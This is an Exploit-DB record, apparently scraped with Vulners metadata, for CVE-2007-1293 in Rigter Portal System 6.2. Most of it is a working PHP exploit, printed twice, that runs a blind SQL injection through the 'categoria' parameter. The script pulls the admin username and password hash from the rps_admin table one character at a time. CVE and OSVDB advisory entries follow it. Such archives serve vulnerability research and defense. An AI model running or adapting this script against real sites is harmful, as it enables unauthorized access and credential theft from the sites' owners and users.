ID EDB-ID:3403
Type exploitdb
Reporter s0cratex
Modified 2007-03-04T00:00:00
Description
Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit. CVE-2007-1293. Webapps exploit for php platform
<?
//RPS 6.2 SQL Injection Exploit
//http://www.rps-project.com/
//Need magic_quotes_gpc = Off;
//by s0cratex
//Contact: s0cratex[at]hotmail[dot]com
//Salu2: rgod, 0pt1x 'n mechas.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$host = "localhost"; $path="/rps"; $id=1;
echo "RPS 6.2 SQL Injection exploit\n-----------------------------\n\n";
echo "Username: ";
$j=1;$result="";
while(!strstr($result,chr(0))){
for($x=0;$x<255;$x++){
$cnx = fsockopen($host,80);
fwrite($cnx, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$x."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx)){ if(ereg("Descargar", fgets($cnx))){ $result .= chr($x);
echo chr($x); break; } }
fclose($cnx);
if ($x==255) {
die("\n Try again...");
}
}
$j++;
}
echo "\n";
echo "Password: ";
$a=1;$result2="";
while(!strstr($result2,chr(0))){
for($i=0;$i<255;$i++){
$cnx2 = fsockopen($host,80);
fwrite($cnx2, "GET ".$path."/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,".$a.",1))=".$i."),1,0))FROM/**/rps_admin/**/WHERE/**/id=".$id.")/* HTTP/1.0\r\nHost: ".$host."\r\n\r\n");
while(!feof($cnx2)){ if(ereg("Descargar", fgets($cnx2))){ $result2 .=
chr($i); echo chr($i); break; } }
fclose($cnx2);
if ($i==255) {
die("\n Try again...");
}
}
$a++;
}
echo "\nThe password has been encrypted with crypt() function...\n-----------------------------\n by s0cratex";
?>
# milw0rm.com [2007-03-04]
{"bulletinFamily": "exploit", "id": "EDB-ID:3403", "cvelist": ["CVE-2007-1293"], "modified": "2007-03-04T00:00:00", "lastseen": "2016-01-31T18:24:20", "edition": 1, "sourceData": "<?\n//RPS 6.2 SQL Injection Exploit\n//http://www.rps-project.com/\n\n//Need magic_quotes_gpc = Off;\n//by s0cratex\n//Contact: s0cratex[at]hotmail[dot]com\n\n//Salu2: rgod, 0pt1x 'n mechas.\n\nerror_reporting(0);\nini_set(\"max_execution_time\",0);\nini_set(\"default_socket_timeout\",5);\n\n$host = \"localhost\"; $path=\"/rps\"; $id=1;\n\necho \"RPS 6.2 SQL Injection exploit\\n-----------------------------\\n\\n\";\necho \"Username: \";\n$j=1;$result=\"\";\nwhile(!strstr($result,chr(0))){\nfor($x=0;$x<255;$x++){\n$cnx = fsockopen($host,80);\nfwrite($cnx, \"GET \".$path.\"/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(username,\".$j.\",1))=\".$x.\"),1,0))FROM/**/rps_admin/**/WHERE/**/id=\".$id.\")/* HTTP/1.0\\r\\nHost: \".$host.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx)){ if(ereg(\"Descargar\", fgets($cnx))){ $result .= chr($x);\necho chr($x); break; } }\nfclose($cnx);\nif ($x==255) {\ndie(\"\\n Try again...\");\n}\n}\n$j++;\n}\necho \"\\n\";\necho \"Password: \";\n$a=1;$result2=\"\";\nwhile(!strstr($result2,chr(0))){\nfor($i=0;$i<255;$i++){\n$cnx2 = fsockopen($host,80);\nfwrite($cnx2, \"GET \".$path.\"/?x=ver_descarga&e=mostrar&categoria=-1'/**/OR/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(password,\".$a.\",1))=\".$i.\"),1,0))FROM/**/rps_admin/**/WHERE/**/id=\".$id.\")/* HTTP/1.0\\r\\nHost: \".$host.\"\\r\\n\\r\\n\");\nwhile(!feof($cnx2)){ if(ereg(\"Descargar\", fgets($cnx2))){ $result2 .=\nchr($i); echo chr($i); break; } }\nfclose($cnx2);\nif ($i==255) {\ndie(\"\\n Try again...\");\n}\n}\n$a++;\n}\necho \"\\nThe password has been encrypted with crypt() function...\\n-----------------------------\\n by s0cratex\";\n?>\n\n# milw0rm.com [2007-03-04]\n", "published": "2007-03-04T00:00:00", "href": "https://www.exploit-db.com/exploits/3403/", "osvdbidlist": ["33831"], "reporter": "s0cratex", "hash": "848c69ee100b58b3fc5441ea0c909ddcd071aa2cc64deac1932f953ec82cfe0f", "title": "Rigter Portal System RPS 6.2 - Remote Blind SQL Injection Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Rigter Portal System (RPS) 6.2 Remote Blind SQL Injection Exploit. CVE-2007-1293. Webapps exploit for php platform", "references": [], "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/3403/", "enchantments": {"vulnersScore": 7.5}}
{"result": {"cve": [{"id": "CVE-2007-1293", "type": "cve", "title": "CVE-2007-1293", "description": "SQL injection vulnerability in Rigter Portal System (RPS) 6.2, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the categoria parameter to the top-level URI (index.php), possibly related to ver_descarga.php.", "published": "2007-03-06T19:19:00", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1293", "cvelist": ["CVE-2007-1293"], "lastseen": "2017-10-11T11:07:02"}], "osvdb": [{"id": "OSVDB:33831", "type": "osvdb", "title": "Rigter Portal System (RPS) index.php categoria Variable SQL Injection", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## References:\n[Secunia Advisory ID:24382](https://secuniaresearch.flexerasoftware.com/advisories/24382/)\nOther Advisory URL: http://milw0rm.com/exploits/3403\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0027.html\nISS X-Force ID: 32784\nFrSIRT Advisory: ADV-2007-0813\n[CVE-2007-1293](https://vulners.com/cve/CVE-2007-1293)\nBugtraq ID: 22813\n", "published": "2007-03-03T10:18:49", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:33831", "cvelist": ["CVE-2007-1293"], "lastseen": "2017-04-28T13:20:30"}]}}
